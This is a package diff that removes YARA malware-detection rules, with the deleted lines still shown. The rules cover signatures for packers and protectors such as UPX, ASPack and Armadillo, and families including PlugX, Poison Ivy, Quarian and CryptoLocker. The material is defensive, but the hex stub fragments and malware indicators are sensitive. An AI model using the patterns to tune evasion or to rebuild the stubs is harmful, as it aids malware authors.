-		$a0 = { 60 E8 00 00 00 00 5D 81 ED F1 26 40 00 8B BD 18 28 40 00 8B 8D 20 28 40 00 B8 38 28 40 00 01 E8 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 1C 28 40 00 31 C0 51 31 C9 66 B9 FA 00 66 83 F9 00 74 49 8B 57 0C 03 95 1C 28 40 00 8B 85 24 28 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 89 CE E8 27 00 00 00 89 C1 5F B8 38 28 40 00 01 E8 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 14 28 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 21 FE 89 F0 5F 5E C3 60 83 F0 05 40 90 48 83 F0 05 89 C6 89 D7 60 E8 0B 00 00 00 61 83 C7 08 83 E9 07 E2 F1 61 C3 57 8B 1F 8B 4F 04 68 B9 79 37 9E 5A 42 89 D0 48 C1 E0 05 BF 20 00 00 00 4A 89 DD C1 E5 04 29 E9 8B 6E 08 31 DD 29 E9 89 DD C1 ED 05 31 C5 29 E9 2B 4E 0C 89 CD C1 E5 04 29 EB 8B 2E 31 CD 29 EB 89 CD C1 ED 05 31 C5 29 EB 2B 5E 04 29 D0 4F 75 C8 5F 89 1F 89 4F 04 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov25xv26x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 EC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PESpinv11Cyberbob
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Escargot01byueMeat
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 08 28 65 73 63 30 2E 31 29 60 68 2B ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 B8 5C ?? ?? ?? 8B 00 FF D0 50 BE 00 10 ?? ?? B9 00 ?? ?? 00 EB 05 49 80 34 31 40 0B C9 75 F7 58 0B C0 74 08 33 C0 C7 00 DE C0 AD 0B BE ?? ?? ?? ?? E9 AC 00 00 00 8B 46 0C BB 00 00 ?? ?? 03 C3 50 50 B8 54 ?? ?? ?? 8B 00 FF D0 5F 80 3F 00 74 06 C6 07 00 47 EB F5 33 FF 8B 16 0B D2 75 03 8B 56 10 03 D3 03 D7 8B 0A C7 02 00 00 00 00 0B C9 74 4B F7 C1 00 00 00 80 74 14 81 E1 FF FF 00 00 50 51 50 B8 50 }
-
-condition:
-		$a0
-}
-	
-	
-rule EncryptPE2200461622006630WFS
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 7A 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElockv060
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 00 00 00 00 60 E8 00 00 00 00 58 83 C0 08 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01BorlandDelphi30Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 90 90 90 90 68 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ActiveMARKTMR5311140Trymedia
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 79 11 7F AB 9A 4A 83 B5 C9 6B 1A 48 F9 27 B4 25 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEBundlev244
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 83 BD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv120v1201
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 9A 70 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv104bAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MESSv120
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FA B9 ?? ?? F3 ?? ?? E3 ?? EB ?? EB ?? B6 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RCryptorv13v14Vaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 8B 44 24 04 83 E8 4F 68 ?? ?? ?? ?? FF D0 58 59 50 }
-	$a1 = { 55 8B EC 8B 44 24 04 83 E8 4F 68 ?? ?? ?? ?? FF D0 58 59 50 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule ThinstallV27XJitit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule eXPressor120BetaPEPacker
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 EB ?? 45 78 50 72 2D 76 2E 31 2E 32 2E 2E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Packanoid10ackanoid
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BF 00 ?? 40 00 BE ?? ?? ?? 00 E8 9D 00 00 00 B8 ?? ?? ?? 00 8B 30 8B 78 04 BB ?? ?? ?? 00 8B 43 04 91 E3 1F 51 FF D6 56 96 8B 13 8B 02 91 E3 0D 52 51 56 FF D7 5A 89 02 83 C2 04 EB EE 83 C3 08 5E EB DB B9 ?? ?? 00 00 BE 00 ?? ?? 00 EB 01 00 BF ?? ?? ?? 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EncryptPE1200331812003518WFS
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 79 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv09781
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 49 87 40 ?? 87 DD 8B 85 CE 87 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv09782
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB D1 84 40 ?? 87 DD 8B 85 56 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01Gleam100Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 0C 53 56 57 E8 24 02 00 FF E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPackAltStubDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 09 00 00 00 C3 F6 00 00 E9 06 02 00 00 33 C9 5E 87 0E E3 F4 2B F1 8B DE AD 2B D8 AD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxModificationofHi924
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 53 51 52 1E 06 9C B8 21 35 CD 21 53 BB ?? ?? 26 ?? ?? 49 48 5B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptor226DLLminimumprotection
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 8B C6 87 04 24 68 ?? ?? ?? ?? 5E E9 ?? ?? ?? ?? 85 C8 E9 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 0F 81 ?? ?? ?? 00 81 FA ?? ?? ?? ?? 33 D0 E9 ?? ?? ?? 00 0F 8D ?? ?? ?? 00 81 D5 ?? ?? ?? ?? F7 D1 0B 15 ?? ?? ?? ?? C1 C2 ?? 81 C2 ?? ?? ?? ?? 9D E9 ?? ?? ?? ?? C1 E2 ?? C1 E8 ?? 81 EA ?? ?? ?? ?? 13 DA 81 E9 ?? ?? ?? ?? 87 04 24 8B C8 E9 ?? ?? ?? ?? 55 8B EC 83 C4 F8 89 45 FC 8B 45 FC 89 45 F8 8B 45 08 E9 ?? ?? ?? ?? 8B 45 E0 C6 00 00 FF 45 E4 E9 ?? ?? ?? ?? FF 45 E4 E9 ?? ?? ?? 00 F7 D3 0F 81 ?? ?? ?? ?? E9 ?? ?? ?? ?? 87 34 24 5E 8B 45 F4 E8 ?? ?? ?? 00 8B 45 F4 8B E5 5D C3 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule yodasProtector102AshkibizDanehlar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ACProtectv135riscosoftwareIncAnticrackSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 55 53 45 52 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 47 65 74 50 72 6F 63 }
-
-condition:
-		$a0
-}
-	
-	
-rule upx_0_80_to_1_24 : Packer
-{
-	meta:
-		author="Kevin Falcoz"
-		date_create="25/02/2013"
-		description="UPX 0.80 to 1.24"
-
-	strings:
-		$str1={6A 60 68 60 02 4B 00 E8 8B 04 00 00 83 65 FC 00 8D 45 90 50 FF 15 8C F1 48 00 C7 45 FC FE FF FF FF BF 94 00 00 00 57}
-		
-	condition:
-		$str1 at pe.entry_point
-}
-
-rule upx_1_00_to_1_07 : Packer
-{
-	meta:
-		author="Kevin Falcoz"
-		date_create="19/03/2013"
-		description="UPX 1.00 to 1.07"
-
-	strings:
-		$str1={60 BE 00 ?0 4? 00 8D BE 00 B0 F? FF ?7 8? [3] ?0 9? [0-9] 90 90 90 90 [0-2] 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0}
-		
-	condition:
-		$str1 at pe.entry_point
-}
-
-rule upx_3 : Packer
-{
-	meta:
-		author="Kevin Falcoz"
-		date_create="25/02/2013"
-		description="UPX 3.X"
-
-	strings:
-		$str1={60 BE 00 [2] 00 8D BE 00 [2] FF [1-12] EB 1? 90 90 90 90 90 [1-3] 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01}
-		
-	condition:
-		$str1 at pe.entry_point
-}
-
-rule obsidium : Packer
-{
-	meta:
-		author="Kevin Falcoz"
-		date_create="21/01/2013"
-		last_edit="17/03/2013"
-		description="Obsidium"
-
-	strings:
-		$str1={EB 02 [2] E8 25 00 00 00 EB 04 [4] EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 [2] C3 EB 02 [2] EB 04} /*EntryPoint*/
-		
-	condition:
-		$str1 at pe.entry_point
-}
-
-rule pecompact2 : Packer
-{
-	meta:
-		author="Kevin Falcoz"
-		date_create="25/02/2013"
-		description="PECompact"
-
-	strings:
-		$str1={B8 [3] 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43} /*EntryPoint*/
-		
-	condition:
-		$str1 at pe.entry_point
-}
-
-rule aspack : Packer
-{
-	meta:
-		author="Kevin Falcoz"
-		date_create="25/02/2013"
-		description="ASPack"
-
-	strings:
-		$str1={60 E8 00 00 00 00 5D 81 ED 5D 3B 40 00 64 A1 30 00 00 00 0F B6 40 02 0A C0 74 04 33 C0 87 00 B9 ?? ?? 00 00 8D BD B7 3B 40 00 8B F7 AC} /*EntryPoint*/
-		
-	condition:
-		$str1 at pe.entry_point
-}
-
-rule execryptor : Protector
-{
-	meta:
-		author="Kevin Falcoz"
-		date_create="25/02/2013"
-		description="EXECryptor"
-
-	strings:
-		$str1={E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 00 00 00 31 C0 89 41 14 89 41 18 80 A1 C1 00 00 00 FE C3 31 C0 64 FF 30 64 89 20 64 8F 05 00 00 00 00} /*EntryPoint*/
-		
-	condition:
-		$str1 at pe.entry_point
-}
-
-rule winrar_sfx : Packer
-{
-	meta:
-		author="Kevin Falcoz"
-		date_create="18/03/2013"
-		description="Winrar SFX Archive"
-	
-	strings:
-		$signature1={00 00 53 6F 66 74 77 61 72 65 5C 57 69 6E 52 41 52 20 53 46 58 00} 
-		
-	condition:
-		$signature1
-}
-
-rule mpress_2_xx_x86 : Packer
-{
-	meta:
-		author="Kevin Falcoz"
-		date_create="19/03/2013"
-		last_edit="24/03/2013"
-		description="MPRESS v2.XX x86  - no .NET"
-	
-	strings:
-		$signature1={60 E8 00 00 00 00 58 05 [2] 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 88 04 31 75 F6}
-		
-	condition:
-		$signature1 at pe.entry_point
-}
-
-rule mpress_2_xx_x64 : Packer
-{
-	meta:
-		author="Kevin Falcoz"
-		date_create="19/03/2013"
-		last_edit="24/03/2013"
-		description="MPRESS v2.XX x64  - no .NET"
-	
-	strings:
-		$signature1={57 56 53 51 52 41 50 48 8D 05 DE 0A 00 00 48 8B 30 48 03 F0 48 2B C0 48 8B FE 66 AD C1 E0 0C 48 8B C8 50 AD 2B C8 48 03 F1 8B C8 57 44 8B C1 FF C9 8A 44 39 06 88 04 31} 
-		
-	condition:
-		$signature1 at pe.entry_point
-}
-
-rule mpress_2_xx_net : Packer
-{
-	meta:
-		author="Kevin Falcoz"
-		date_create="24/03/2013"
-		description="MPRESS v2.XX .NET"
-	
-	strings:
-		$signature1={21 46 00 69 00 6C 00 65 00 20 00 69 00 73 00 20 00 69 00 6E 00 76 00 61 00 6C 00 69 00 64 00 2E 00 00 0D 4D 00 50 00 52 00 45 00 53 00 53 00 00 00 00 00 2D 2D 93 6B 35 04 2E 43 85 EF}
-		
-	condition:
-		$signature1
-}
-
-rule rpx_1_xx : Packer
-{
-	meta:
-		author="Kevin Falcoz"
-		date_create="24/03/2013"
-		description="RPX v1.XX"
-	
-	strings:
-		$signature1= "RPX 1."
-		$signature2= "Copyright ©  20"
-		
-	condition:
-		$signature1 and $signature2
-}
-
-rule mew_11_xx : Packer
-{
-	meta:
-		author="Kevin Falcoz"
-		date_create="25/03/2013"
-		description="MEW 11"
-	
-	strings:
-		$signature1={50 72 6F 63 41 64 64 72 65 73 73 00 E9 [6-7] 00 00 00 00 00 00 00 00 00 [7] 00}
-		$signature2="MEW"
-		
-	condition:
-		$signature1 and $signature2
-}
-
-rule yoda_crypter_1_2 : Crypter
-{
-	meta:
-		author="Kevin Falcoz"
-		date_create="15/04/2013"
-		description="Yoda Crypter 1.2"
-	
-	strings:
-		$signature1={60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 AC [19] EB 01 [27] AA E2 CC}
-		
-	condition:
-		$signature1 at pe.entry_point
-}
-
-rule yoda_crypter_1_3 : Crypter
-{
-	meta:
-		author="Kevin Falcoz"
-		date_create="15/04/2013"
-		description="Yoda Crypter 1.3"
-	
-	strings:
-		$signature1={55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 6C 28 40 00 B9 5D 34 40 00 81 E9 C6 28 40 00 8B D5 81 C2 C6 28 40 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC}
-		
-	condition:
-		$signature1 at pe.entry_point
-}
diff -Nru remnux-rules-0.0.3/yara/PlugX.yara remnux-rules-0.0.4/yara/PlugX.yara
--- remnux-rules-0.0.3/yara/PlugX.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/PlugX.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,47 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule PlugXStrings : PlugX Family
-{
-    meta:
-        description = "PlugX Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-12"
-        
-    strings:
-        $BootLDR = "boot.ldr" wide ascii
-        $Dwork = "d:\\work" nocase
-        $Plug25 = "plug2.5"
-        $Plug30 = "Plug3.0"
-        $Shell6 = "Shell6"
-      
-    condition:
-        $BootLDR or ($Dwork and ($Plug25 or $Plug30 or $Shell6))
-}
-
-rule plugX : rat
-{
-	meta:
-		author = "Jean-Philippe Teissier / @Jipe_"
-		description = "PlugX RAT"
-		date = "2014-05-13"
-		filetype = "memory"
-		version = "1.0" 
-		ref1 = "https://github.com/mattulm/IR-things/blob/master/volplugs/plugx.py"
-		
-	strings:
-		$v1a = { 47 55 4C 50 00 00 00 00 }
-		$v1b = "/update?id=%8.8x" 
-		$v1algoa = { BB 33 33 33 33 2B } 
-		$v1algob = { BB 44 44 44 44 2B } 
-		$v2a = "Proxy-Auth:" 
-		$v2b = { 68 A0 02 00 00 } 
-		$v2k = { C1 8F 3A 71 } 
-		
-	condition: 
-		$v1a at 0 or $v1b or (($v2a or $v2b) and (($v1algoa and $v1algob) or $v2k))
-}
diff -Nru remnux-rules-0.0.3/yara/PoisonIvy.yara remnux-rules-0.0.4/yara/PoisonIvy.yara
--- remnux-rules-0.0.3/yara/PoisonIvy.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/PoisonIvy.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,24 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule poisonivy : rat
-{
-	meta:
-		description = "Poison Ivy"
-		author = "Jean-Philippe Teissier / @Jipe_"
-		date = "2013-02-01"
-		filetype = "memory"
-		version = "1.0" 
-		ref1 = "https://code.google.com/p/volatility/source/browse/trunk/contrib/plugins/malware/poisonivy.py"
-
-	strings:
-		$a = { 53 74 75 62 50 61 74 68 ?? 53 4F 46 54 57 41 52 45 5C 43 6C 61 73 73 65 73 5C 68 74 74 70 5C 73 68 65 6C 6C 5C 6F 70 65 6E 5C 63 6F 6D 6D 61 6E 64 [22] 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 41 63 74 69 76 65 20 53 65 74 75 70 5C 49 6E 73 74 61 6C 6C 65 64 20 43 6F 6D 70 6F 6E 65 6E 74 73 5C } 
-		
-	condition:
-		$a
-}
-
diff -Nru remnux-rules-0.0.3/yara/PubSab.yara remnux-rules-0.0.4/yara/PubSab.yara
--- remnux-rules-0.0.3/yara/PubSab.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/PubSab.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,47 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule PubSabCode : PubSab Family 
-{
-    meta:
-        description = "PubSab code tricks"
-        author = "Seth Hardy"
-        last_modified = "2014-06-19"
-        
-    strings:
-        $decrypt = { 6B 45 E4 37 89 CA 29 C2 89 55 E4 }
-        
-    condition:
-        any of them
-}
-
-rule PubSabStrings : PubSab Family
-{
-    meta:
-        description = "PubSab Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-19"
-        
-    strings:
-        $ = "_deamon_init"
-        $ = "com.apple.PubSabAgent"
-        $ = "/tmp/screen.jpeg"
-       
-    condition:
-        any of them
-}
-
-rule PubSab : Family
-{
-    meta:
-        description = "PubSab"
-        author = "Seth Hardy"
-        last_modified = "2014-06-19"
-        
-    condition:
-        PubSabCode or PubSabStrings
-}
diff -Nru remnux-rules-0.0.3/yara/Quarian.yara remnux-rules-0.0.4/yara/Quarian.yara
--- remnux-rules-0.0.3/yara/Quarian.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Quarian.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,75 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule QuarianStrings : Quarian Family
-{
-    meta:
-        description = "Quarian Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-07-09"
-        
-    strings:
-        $ = "s061779s061750"
-        $ = "[OnUpLoadFile]"
-        $ = "[OnDownLoadFile]"
-        $ = "[FileTransfer]"
-        $ = "---- Not connect the Manager, so start UnInstall ----"
-        $ = "------- Enter CompressDownLoadDir ---------"
-        $ = "------- Enter DownLoadDirectory ---------"
-        $ = "[HandleAdditionalData]"
-        $ = "[mswsocket.dll]"
-        $ = "msupdate.dll........Enter ThreadCmd!"
-        $ = "ok1-1"
-        $ = "msupdate_tmp.dll"
-        $ = "replace Rpcss.dll successfully!"
-        $ = "f:\\loadhiddendriver-mdl\\objfre_win7_x86\\i386\\intelnat.pdb"
-        $ = "\\drivercashe\\" wide ascii
-        $ = "\\microsoft\\windwos\\" wide ascii
-        $ = "\\DosDevices\\LOADHIDDENDRIVER" wide ascii
-        $ = "\\Device\\LOADHIDDENDRIVER" wide ascii
-        $ = "Global\\state_maping" wide ascii
-        $ = "E:\\Code\\2.0\\2.0_multi-port\\2.0\\ServerInstall_New-2010-0913_sp3\\msupdataDll\\Release\\msupdate_tmp.pdb"
-        $ = "Global\\unInstall_event_1554_Ower" wide ascii
-        
-    condition:
-       any of them
-}
-
-rule QuarianCode : Quarian Family 
-{
-    meta:
-        description = "Quarian code features"
-        author = "Seth Hardy"
-        last_modified = "2014-07-09"
-    
-    strings:
-        // decrypt in intelnat.sys
-        $ = { C1 E? 04 8B ?? F? C1 E? 05 33 C? }
-        // decrypt in mswsocket.dll
-        $ = { C1 EF 05 C1 E3 04 33 FB }
-        $ = { 33 D8 81 EE 47 86 C8 61 }
-        // loop in msupdate.dll
-        $ = { FF 45 E8 81 45 EC CC 00 00 00 E9 95 FE FF FF }
-    
-    condition:
-        any of them
-}
-
-rule Quarian : Family
-{
-    meta:
-        description = "Quarian"
-        author = "Seth Hardy"
-        last_modified = "2014-07-09"
-        
-    condition:
-        QuarianCode or QuarianStrings
-}
-
-
-
-
diff -Nru remnux-rules-0.0.3/yara/Ramsonware.yara remnux-rules-0.0.4/yara/Ramsonware.yara
--- remnux-rules-0.0.3/yara/Ramsonware.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Ramsonware.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,65 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule CryptoLocker_set1
-{
-meta:
-	author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
-	date = "2014-04-13"
-	description = "Detection of Cryptolocker Samples"
-	
-strings:
-	$string0 = "static"
-	$string1 = " kscdS"
-	$string2 = "Romantic"
-	$string3 = "CompanyName" wide
-	$string4 = "ProductVersion" wide
-	$string5 = "9%9R9f9q9"
-	$string6 = "IDR_VERSION1" wide
-	$string7 = "  </trustInfo>"
-	$string8 = "LookFor" wide
-	$string9 = ":n;t;y;"
-	$string10 = "        <requestedExecutionLevel level"
-	$string11 = "VS_VERSION_INFO" wide
-	$string12 = "2.0.1.0" wide
-	$string13 = "<assembly xmlns"
-	$string14 = "  <trustInfo xmlns"
-	$string15 = "srtWd@@"
-	$string16 = "515]5z5"
-	$string17 = "C:\\lZbvnoVe.exe" wide
-condition:
-	8 of ($string*)
-}
-
-rule CryptoLocker_rule2
-{
-meta:
-	author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
-	date = "2014-04-14"
-	description = "Detection of CryptoLocker Variants"
-strings:
-	$string0 = "2.0.1.7" wide
-	$string1 = "    <security>"
-	$string2 = "Romantic"
-	$string3 = "ProductVersion" wide
-	$string4 = "9%9R9f9q9"
-	$string5 = "IDR_VERSION1" wide
-	$string6 = "button"
-	$string7 = "    </security>"
-	$string8 = "VFileInfo" wide
-	$string9 = "LookFor" wide
-	$string10 = "      </requestedPrivileges>"
-	$string11 = " uiAccess"
-	$string12 = "  <trustInfo xmlns"
-	$string13 = "last.inf"
-	$string14 = " manifestVersion"
-	$string15 = "FFFF04E3" wide
-	$string16 = "3,31363H3P3m3u3z3"
-condition:
-	8 of ($string*)
-}
-
